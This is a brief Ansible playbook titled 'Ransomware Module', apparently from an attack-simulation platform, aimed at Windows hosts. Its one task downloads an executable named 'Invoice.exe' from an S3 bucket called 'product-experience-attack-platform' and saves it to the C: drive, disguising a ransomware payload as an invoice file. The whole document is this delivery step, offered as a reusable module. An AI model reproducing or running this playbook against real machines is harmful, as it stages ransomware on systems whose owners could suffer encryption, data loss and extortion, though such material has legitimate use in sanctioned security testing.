---
# Ransomware Module
- hosts: "{{target}}"
  gather_facts: no
  tasks:
  - name: Download Ransomware
    win_get_url:
       url: https://product-experience-attack-platform.s3.us-east-2.amazonaws.com/Invoice.exe
       dest: c:\Invoice.exe
    
  
    
  
  
